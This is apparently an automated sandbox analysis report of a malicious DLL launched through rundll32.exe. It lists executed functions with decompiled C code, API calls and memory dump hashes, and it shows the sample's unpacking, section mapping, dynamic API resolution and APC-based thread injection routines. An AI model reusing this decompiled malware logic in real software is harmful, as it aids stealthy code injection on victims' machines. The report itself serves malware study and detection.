Memory Dump Source

Source File: 00000000.00000002.479684101.00000000011D1000.00000020.00000001.sdmp, Offset: 011D0000, based on PE: true

Associated: 00000000.00000002.479673787.00000000011D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479715506.00000000011D9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.479745898.00000000011DA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479794058.00000000011DC000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlen$AllocateHeaplstrcatlstrcpy
String ID:
API String ID: 74227042-0
Opcode ID: 381f33f78a53a69184498bb0a7a60eb182f58c3b68931f564ee6c3ba2b56534d
Instruction ID: 98921d184663d9fc6066433a3f84d89936a69f55be699d3e68fd36c1a3be0912
Opcode Fuzzy Hash: 381f33f78a53a69184498bb0a7a60eb182f58c3b68931f564ee6c3ba2b56534d
Instruction Fuzzy Hash: EFE092739032256787259BE8AC48C9FBBADFF996153040426FA20D3104CB30D805CBE0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 5312 Parent PID: 4948 rundll32.exeCOMMON

Executed Functions

Function 03154F71, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,00000941,00003000,00000040,00000941,031549C8), ref: 0315502E
VirtualAlloc.KERNEL32(00000000,00000056,00003000,00000040,03154A2A), ref: 03155065
VirtualAlloc.KERNEL32(00000000,0000C27B,00003000,00000040), ref: 031550C5
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 031550FB
VirtualProtect.KERNEL32(030E0000,00000000,00000004,03154F50), ref: 03155200
VirtualProtect.KERNEL32(030E0000,00001000,00000004,03154F50), ref: 03155227
VirtualProtect.KERNEL32(00000000,?,00000002,03154F50), ref: 031552F4
VirtualProtect.KERNEL32(00000000,?,00000002,03154F50,?), ref: 0315534A
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 03155366

Memory Dump Source

Source File: 00000004.00000002.481379048.0000000003154000.00000040.00020000.sdmp, Offset: 03154000, based on PE: false

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: 32be68320190b8bb7228a8e069a5c313f1a90531dfc18a59675f2d3a529aa34d
Instruction ID: f4265518496c16196bd24e770d1d0681cc7c6beb0cb8b2b74a6eb73b4e2ca9e2
Opcode Fuzzy Hash: 32be68320190b8bb7228a8e069a5c313f1a90531dfc18a59675f2d3a529aa34d
Instruction Fuzzy Hash: 0AD19C77500600EFCB15CF1AC9C0B5277A6FF6C310B0D6194ED99AFA5AE770A850CB66

Uniqueness

Uniqueness Score: -1.00%

Function 03115A90, Relevance: 6.3, APIs: 1, Strings: 2, Instructions: 1084COMMON

Download Yara Rule

Strings

#, xrefs: 03116649
I#, xrefs: 0311647A

Memory Dump Source

Source File: 00000004.00000002.481000123.00000000030EE000.00000020.00020000.sdmp, Offset: 030EE000, based on PE: false

Similarity

API ID:
String ID: #$I#
API String ID: 0-3815891943
Opcode ID: 128cac4953ff6a09beec52d795a53b08f703149cdbb3903d0e1d98be59c8a696
Instruction ID: f479de8e083fcf7cc05c25a5919bbe907b699cc55e88a85e2909c801ec98d90a
Opcode Fuzzy Hash: 128cac4953ff6a09beec52d795a53b08f703149cdbb3903d0e1d98be59c8a696
Instruction Fuzzy Hash: EFA2C07B904351CFC72DEF18E9903A5BBA6A78C384B09483ED8E487259D331959DCBB1

Uniqueness

Uniqueness Score: -1.00%

Function 030E1B9C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E030E1B9C(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E030E1EC7(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}

0x030e1ba5
0x030e1bac
0x030e1bad
0x030e1bae
0x030e1baf
0x030e1bb0
0x030e1bc1
0x030e1bc5
0x030e1bd9
0x030e1bdc
0x030e1bdf
0x030e1be6
0x030e1be9
0x030e1bf0
0x030e1bf3
0x030e1bf6
0x030e1bf9
0x030e1bfe
0x030e1c39
0x030e1c00
0x030e1c03
0x030e1c09
0x030e1c0e
0x030e1c12
0x030e1c30
0x030e1c14
0x030e1c1b
0x030e1c29
0x030e1c29
0x030e1c12
0x030e1c41

APIs

NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,74B04EE0,00000000,00000000,?), ref: 030E1BF9

Part of subcall function 030E1EC7: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,030E1C0E,00000002,00000000,?,?,00000000,?,?,030E1C0E,00000000), ref: 030E1EF4

memset.NTDLL ref: 030E1C1B

Strings

@, xrefs: 030E1BE9

Memory Dump Source

Source File: 00000004.00000002.480861932.00000000030E1000.00000020.00020000.sdmp, Offset: 030E0000, based on PE: true

Associated: 00000004.00000002.480836634.00000000030E0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480885021.00000000030E3000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480912036.00000000030E5000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480971189.00000000030E6000.00000002.00020000.sdmp Download File

Similarity

API ID: Section$CreateViewmemset
String ID: @
API String ID: 2533685722-2766056989
Opcode ID: 4d7eee9f11a7039b7ba48ef3c3db40ff58bda86e38dd00c02ef6a9748d42a3ba
Instruction ID: de6e06cd4a4b7790dd59ca283a3517afab728201b57f6581da06d9d78be0e574
Opcode Fuzzy Hash: 4d7eee9f11a7039b7ba48ef3c3db40ff58bda86e38dd00c02ef6a9748d42a3ba
Instruction Fuzzy Hash: 96213BB5E0020DAFCB10DFA9C8809EEFBF9FB48304F108869E615F7210D7309A048B64

Uniqueness

Uniqueness Score: -1.00%

Function 030E1EC7, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E030E1EC7(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}

0x030e1ed9
0x030e1edf
0x030e1eed
0x030e1ef4
0x030e1ef9
0x030e1eff
0x00000000
0x030e1f00
0x00000000

APIs

NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,030E1C0E,00000002,00000000,?,?,00000000,?,?,030E1C0E,00000000), ref: 030E1EF4

Memory Dump Source

Source File: 00000004.00000002.480861932.00000000030E1000.00000020.00020000.sdmp, Offset: 030E0000, based on PE: true

Associated: 00000004.00000002.480836634.00000000030E0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480885021.00000000030E3000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480912036.00000000030E5000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480971189.00000000030E6000.00000002.00020000.sdmp Download File

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction ID: 9a6bdaff6ba343ac312b727a95943914c5a3b4d5d196bfa06b2fcc606ceaa24f
Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction Fuzzy Hash: 72F01CB6A0420CBFEB119FA5CC85CAFBBBDEB48294B104939F552E1191D6309E088A60

Uniqueness

Uniqueness Score: -1.00%

Function 030E1C7D, Relevance: 15.1, APIs: 10, Instructions: 103
threadsleepsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E030E1C7D(intOrPtr _a4) {
				char _v28;
				struct _SYSTEMTIME _v44;
				char _v48;
				long _v52;
				long _v56;
				void* __edi;
				long _t21;
				int _t23;
				long _t26;
				long _t27;
				long _t31;
				void* _t37;
				intOrPtr _t39;
				intOrPtr _t44;
				signed int _t45;
				void* _t50;
				signed int _t54;
				void* _t56;
				intOrPtr* _t57;

				_t21 = E030E1F10();
				_v52 = _t21;
				if(_t21 != 0) {
					L18:
					return _t21;
				} else {
					goto L1;
				}
				do {
					L1:
					GetSystemTime( &_v44);
					_t23 = SwitchToThread();
					asm("cdq");
					_t45 = 9;
					_t54 = _t23 + (_v44.wMilliseconds & 0x0000ffff) % _t45;
					_t26 = E030E18AD(0, _t54); // executed
					_v56 = _t26;
					Sleep(_t54 << 5); // executed
					_t21 = _v56;
				} while (_t21 == 0xc);
				if(_t21 != 0) {
					goto L18;
				}
				_t27 = E030E1ADB(_t45); // executed
				_v52 = _t27;
				if(_t27 != 0) {
					L16:
					_t21 = _v52;
					if(_t21 == 0xffffffff) {
						_t21 = GetLastError();
					}
					goto L18;
				}
				if(_a4 != 0) {
					L11:
					_push(0);
					_t56 = E030E13D1(E030E14E8,  &_v28);
					if(_t56 == 0) {
						_v56 = GetLastError();
					} else {
						_t31 = WaitForSingleObject(_t56, 0xffffffff);
						_v56 = _t31;
						if(_t31 == 0) {
							GetExitCodeThread(_t56,  &_v56);
						}
						CloseHandle(_t56);
					}
					goto L16;
				}
				if(E030E134F(_t45,  &_v48) != 0) {
					 *0x30e41b8 = 0;
					goto L11;
				}
				_t44 = _v48;
				_t57 = __imp__GetLongPathNameW;
				_t37 =  *_t57(_t44, 0, 0); // executed
				_t50 = _t37;
				if(_t50 == 0) {
					L9:
					 *0x30e41b8 = _t44;
					goto L11;
				}
				_t15 = _t50 + 2; // 0x2
				_t39 = E030E1B58(_t50 + _t15);
				 *0x30e41b8 = _t39;
				if(_t39 == 0) {
					goto L9;
				} else {
					 *_t57(_t44, _t39, _t50); // executed
					E030E142F(_t44);
					goto L11;
				}
			}

0x030e1c89
0x030e1c92
0x030e1c96
0x030e1d9e
0x030e1da4
0x00000000
0x00000000
0x00000000
0x030e1c9c
0x030e1c9c
0x030e1ca1
0x030e1ca7
0x030e1cb6
0x030e1cb7
0x030e1cba
0x030e1cbd
0x030e1cc6
0x030e1cca
0x030e1cd0
0x030e1cd4
0x030e1cdb
0x00000000
0x00000000
0x030e1ce1
0x030e1ce8
0x030e1cec
0x030e1d8f
0x030e1d8f
0x030e1d96
0x030e1d98
0x030e1d98
0x00000000
0x030e1d96
0x030e1cf5
0x030e1d48
0x030e1d48
0x030e1d59
0x030e1d5d
0x030e1d8b
0x030e1d5f
0x030e1d62
0x030e1d6a
0x030e1d6e
0x030e1d76
0x030e1d76
0x030e1d7d
0x030e1d7d
0x00000000
0x030e1d5d
0x030e1d03
0x030e1d42
0x00000000
0x030e1d42
0x030e1d05
0x030e1d09
0x030e1d12
0x030e1d14
0x030e1d18
0x030e1d3a
0x030e1d3a
0x00000000
0x030e1d3a
0x030e1d1a
0x030e1d1f
0x030e1d26
0x030e1d2b
0x00000000
0x030e1d2d
0x030e1d30
0x030e1d33
0x00000000
0x030e1d33

APIs

Part of subcall function 030E1F10: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,030E1C8E,74B063F0,00000000), ref: 030E1F1F
Part of subcall function 030E1F10: GetVersion.KERNEL32 ref: 030E1F2E
Part of subcall function 030E1F10: GetCurrentProcessId.KERNEL32 ref: 030E1F3D
Part of subcall function 030E1F10: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 030E1F56

GetSystemTime.KERNEL32(?,74B063F0,00000000), ref: 030E1CA1
SwitchToThread.KERNEL32 ref: 030E1CA7

Part of subcall function 030E18AD: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00000000), ref: 030E1903
Part of subcall function 030E18AD: memcpy.NTDLL(?,?,?,?,?,?,00000000), ref: 030E19C9

Sleep.KERNELBASE(00000000,00000000), ref: 030E1CCA
GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 030E1D12
GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 030E1D30
WaitForSingleObject.KERNEL32(00000000,000000FF,030E14E8,?,00000000), ref: 030E1D62
GetExitCodeThread.KERNEL32(00000000,?), ref: 030E1D76
CloseHandle.KERNEL32(00000000), ref: 030E1D7D
GetLastError.KERNEL32(030E14E8,?,00000000), ref: 030E1D85
GetLastError.KERNEL32 ref: 030E1D98

Memory Dump Source

Source File: 00000004.00000002.480861932.00000000030E1000.00000020.00020000.sdmp, Offset: 030E0000, based on PE: true

Associated: 00000004.00000002.480836634.00000000030E0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480885021.00000000030E3000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480912036.00000000030E5000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480971189.00000000030E6000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastLongNamePathProcessThread$AllocCloseCodeCreateCurrentEventExitHandleObjectOpenSingleSleepSwitchSystemTimeVersionVirtualWaitmemcpy
String ID:
API String ID: 1962885430-0
Opcode ID: c2de72118fe77acc4bef89866a5d0628ba7f86ab2a502ce688b604c2ed06e5f4
Instruction ID: 1cfb3e5afb00972b77053b0689a805133448c8181ad89d6abcefdd8a3d19ac60
Opcode Fuzzy Hash: c2de72118fe77acc4bef89866a5d0628ba7f86ab2a502ce688b604c2ed06e5f4
Instruction Fuzzy Hash: EC31627970A311AFC764EFB5D8489AF7BECAAC5651B14095AF860CB140EB74C54087A2

Uniqueness

Uniqueness Score: -1.00%

Function 030E1144, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E030E1144(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L030E2210();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x30e41d0;
				_push(_t15 + 0x30e505e);
				_push(_t15 + 0x30e5054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L030E220A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x30e41c0, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

0x030e1144
0x030e114d
0x030e1151
0x030e1157
0x030e115c
0x030e1161
0x030e1164
0x030e1167
0x030e116c
0x030e116d
0x030e1170
0x030e117b
0x030e1182
0x030e1186
0x030e1188
0x030e1189
0x030e118c
0x030e1191
0x030e119b
0x030e119d
0x030e119d
0x030e11b1
0x030e11b7
0x030e11bb
0x030e120b
0x030e11bd
0x030e11c6
0x030e11dc
0x030e11e4
0x030e11f6
0x030e11fa
0x00000000
0x00000000
0x030e11e6
0x030e11e9
0x030e11ee
0x030e11f0
0x030e11f0
0x030e11d1
0x030e11d3
0x030e11fc
0x030e11fd
0x030e11fd
0x030e11c6
0x030e1213

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,030E156A,0000000A,?,?), ref: 030E1151
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 030E1167
_snwprintf.NTDLL ref: 030E118C
CreateFileMappingW.KERNELBASE(000000FF,030E41C0,00000004,00000000,?,?), ref: 030E11B1
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,030E156A,0000000A,?), ref: 030E11C8
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 030E11DC
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,030E156A,0000000A,?), ref: 030E11F4
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,030E156A,0000000A), ref: 030E11FD
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,030E156A,0000000A,?), ref: 030E1205

Memory Dump Source

Source File: 00000004.00000002.480861932.00000000030E1000.00000020.00020000.sdmp, Offset: 030E0000, based on PE: true

Associated: 00000004.00000002.480836634.00000000030E0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480885021.00000000030E3000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480912036.00000000030E5000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480971189.00000000030E6000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1724014008-0
Opcode ID: 44b230bef857b4f4ce8dc05e29fd84d573efea5e639c5c763fc95ced501c6c47
Instruction ID: 4d4a54bdfcc4e408edcc27dd2a9371689a3c66492d9be2eb09443e915fca5039
Opcode Fuzzy Hash: 44b230bef857b4f4ce8dc05e29fd84d573efea5e639c5c763fc95ced501c6c47
Instruction Fuzzy Hash: DA21C5BA702108BFCB24EF9CDC84EDE7BACEB48352F1445A9F615DB140D6749911CB61

Uniqueness

Uniqueness Score: -1.00%

Function 03125220, Relevance: 10.8, APIs: 7, Instructions: 317COMMON

Download Yara Rule

APIs

GetStartupInfoA.KERNEL32(?), ref: 0312525E
GetFileType.KERNEL32(?), ref: 031254C7

Memory Dump Source

Source File: 00000004.00000002.481000123.00000000030EE000.00000020.00020000.sdmp, Offset: 030EE000, based on PE: false

Similarity

API ID: FileInfoStartupType
String ID:
API String ID: 3016745765-0
Opcode ID: 4476bd2bd65ed4214ee06104965b4ea574acf8d2d1566f1d48dbcdbd1b403425
Instruction ID: da504d958496c3b5ed0ebe459a3a0d8f3ef2a2614c7cf213ff27257b110a4643
Opcode Fuzzy Hash: 4476bd2bd65ed4214ee06104965b4ea574acf8d2d1566f1d48dbcdbd1b403425
Instruction Fuzzy Hash: E0E1FB74E04258CFDB24CFA8C894AADFBB2BB4E315F24825DD865AB386D7319851CF50

Uniqueness

Uniqueness Score: -1.00%

Function 030E1060, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E030E1060(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E030E1B58(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x30e41d0 + 0x30e5014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x30e41d0 + 0x30e50e1);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E030E142F(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x30e41d0 + 0x30e50f1);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x30e41d0 + 0x30e5104);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x30e41d0 + 0x30e5119);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x30e41d0 + 0x30e512f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E030E1B9C(_t56, _a12); // executed
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x030e106e
0x030e1072
0x030e1133
0x030e1078
0x030e1090
0x030e109f
0x030e10a6
0x030e10aa
0x030e10ad
0x030e112b
0x030e112c
0x030e10af
0x030e10bc
0x030e10c0
0x030e10c3
0x00000000
0x030e10c5
0x030e10d2
0x030e10d6
0x030e10d9
0x00000000
0x030e10db
0x030e10e8
0x030e10ec
0x030e10ef
0x00000000
0x030e10f1
0x030e10fe
0x030e1102
0x030e1105
0x00000000
0x030e1107
0x030e110d
0x030e1113
0x030e1118
0x030e111f
0x030e1122
0x00000000
0x030e1124
0x030e1127
0x030e1127
0x030e1122
0x030e1105
0x030e10ef
0x030e10d9
0x030e10c3
0x030e10ad
0x030e1141

APIs

Part of subcall function 030E1B58: HeapAlloc.KERNEL32(00000000,?,030E1702,?,00000000,00000000,?,?,?,030E1CE6), ref: 030E1B64

GetModuleHandleA.KERNEL32(?,00000020,00000002,?,?,?,?,030E1480,?,?,?,?,00000002,00000000,?,?), ref: 030E1084
GetProcAddress.KERNEL32(00000000,?), ref: 030E10A6
GetProcAddress.KERNEL32(00000000,?), ref: 030E10BC
GetProcAddress.KERNEL32(00000000,?), ref: 030E10D2
GetProcAddress.KERNEL32(00000000,?), ref: 030E10E8
GetProcAddress.KERNEL32(00000000,?), ref: 030E10FE

Part of subcall function 030E1B9C: NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,74B04EE0,00000000,00000000,?), ref: 030E1BF9
Part of subcall function 030E1B9C: memset.NTDLL ref: 030E1C1B

Memory Dump Source

Source File: 00000004.00000002.480861932.00000000030E1000.00000020.00020000.sdmp, Offset: 030E0000, based on PE: true

Associated: 00000004.00000002.480836634.00000000030E0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480885021.00000000030E3000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480912036.00000000030E5000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480971189.00000000030E6000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
String ID:
API String ID: 1632424568-0
Opcode ID: fb6ba6a5c1657245f1ff9f6d5c441e36b04a9a91c06b98ed0c6fc569e31a8084
Instruction ID: 516830278ad523c1e867775ab77438cbdd3eec139e9a3bfe195e619ee04a3569
Opcode Fuzzy Hash: fb6ba6a5c1657245f1ff9f6d5c441e36b04a9a91c06b98ed0c6fc569e31a8084
Instruction Fuzzy Hash: 1A2174B970270A9FCB50EF6EEC80D9A77FCFB44644B0549A5E905CB215E734E902CB61

Uniqueness

Uniqueness Score: -1.00%

Function 030E1DAE, Relevance: 9.1, APIs: 6, Instructions: 71
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x30e4188);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x30e418c;
						if( *0x30e418c != 0) {
							_t36 = 0x2328;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x30e4198;
								if( *0x30e4198 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x30e418c);
						}
						HeapDestroy( *0x30e4190);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x30e4188) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						_t41 = _t18;
						 *0x30e4190 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x30e41b0 = _a4;
							asm("lock xadd [eax], edi");
							_push( &_a8);
							_t23 = E030E13D1(E030E20CE, E030E121C(_a12, 1, 0x30e4198, _t41));
							 *0x30e418c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}

0x030e1db1
0x030e1dbd
0x030e1dbf
0x030e1dc2
0x030e1e38
0x030e1e3e
0x030e1e40
0x030e1e42
0x030e1e48
0x030e1e4a
0x030e1e4f
0x030e1e52
0x030e1e5d
0x030e1e5f
0x00000000
0x00000000
0x030e1e61
0x030e1e64
0x030e1e66
0x00000000
0x00000000
0x00000000
0x030e1e66
0x030e1e6e
0x030e1e6e
0x030e1e7a
0x030e1e7a
0x030e1dc4
0x030e1dc5
0x030e1de5
0x030e1deb
0x030e1ded
0x030e1df2
0x030e1e2e
0x030e1e2e
0x030e1df4
0x030e1dfc
0x030e1e03
0x030e1e0d
0x030e1e19
0x030e1e20
0x030e1e25
0x030e1e2a
0x00000000
0x030e1e2a
0x030e1e25
0x030e1df2
0x030e1dc5
0x030e1e87

APIs

InterlockedIncrement.KERNEL32(030E4188), ref: 030E1DD0
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 030E1DE5

Part of subcall function 030E13D1: CreateThread.KERNEL32 ref: 030E13E8
Part of subcall function 030E13D1: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 030E13FD
Part of subcall function 030E13D1: GetLastError.KERNEL32(00000000), ref: 030E1408
Part of subcall function 030E13D1: TerminateThread.KERNEL32(00000000,00000000), ref: 030E1412
Part of subcall function 030E13D1: CloseHandle.KERNEL32(00000000), ref: 030E1419
Part of subcall function 030E13D1: SetLastError.KERNEL32(00000000), ref: 030E1422

InterlockedDecrement.KERNEL32(030E4188), ref: 030E1E38
SleepEx.KERNEL32(00000064,00000001), ref: 030E1E52
CloseHandle.KERNEL32 ref: 030E1E6E
HeapDestroy.KERNEL32 ref: 030E1E7A

Memory Dump Source

Source File: 00000004.00000002.480861932.00000000030E1000.00000020.00020000.sdmp, Offset: 030E0000, based on PE: true

Associated: 00000004.00000002.480836634.00000000030E0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480885021.00000000030E3000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480912036.00000000030E5000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480971189.00000000030E6000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
String ID:
API String ID: 2110400756-0
Opcode ID: c657c90d7ada26dd844def7e9ea02a0678aa577a355f56977c4fe485bf5f7288
Instruction ID: 3cc71fcf5563c61f8aacc967ded730888060daacdae30dd5eb3c9fe094828788
Opcode Fuzzy Hash: c657c90d7ada26dd844def7e9ea02a0678aa577a355f56977c4fe485bf5f7288
Instruction Fuzzy Hash: 63219339B03305AFCB58EFAFEC84A5E7BE9F754A6171801A9F655DB244D6388900CB50

Uniqueness

Uniqueness Score: -1.00%

Function 030E13D1, Relevance: 9.0, APIs: 6, Instructions: 32
threadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E030E13D1(long _a4, DWORD* _a12) {
				_Unknown_base(*)()* _v0;
				void* _t4;
				long _t6;
				long _t11;
				void* _t13;

				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x30e41cc, 0, _a12); // executed
				_t13 = _t4;
				if(_t13 != 0) {
					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
					if(_t6 == 0) {
						_t11 = GetLastError();
						TerminateThread(_t13, _t11);
						CloseHandle(_t13);
						_t13 = 0;
						SetLastError(_t11);
					}
				}
				return _t13;
			}

0x030e13e8
0x030e13ee
0x030e13f2
0x030e13fd
0x030e1405
0x030e140e
0x030e1412
0x030e1419
0x030e1420
0x030e1422
0x030e1428
0x030e1405
0x030e142c

APIs

CreateThread.KERNEL32 ref: 030E13E8
QueueUserAPC.KERNELBASE(?,00000000,?), ref: 030E13FD
GetLastError.KERNEL32(00000000), ref: 030E1408
TerminateThread.KERNEL32(00000000,00000000), ref: 030E1412
CloseHandle.KERNEL32(00000000), ref: 030E1419
SetLastError.KERNEL32(00000000), ref: 030E1422

Memory Dump Source

Source File: 00000004.00000002.480861932.00000000030E1000.00000020.00020000.sdmp, Offset: 030E0000, based on PE: true

Associated: 00000004.00000002.480836634.00000000030E0000.00000002.00020000.sdmp Download File
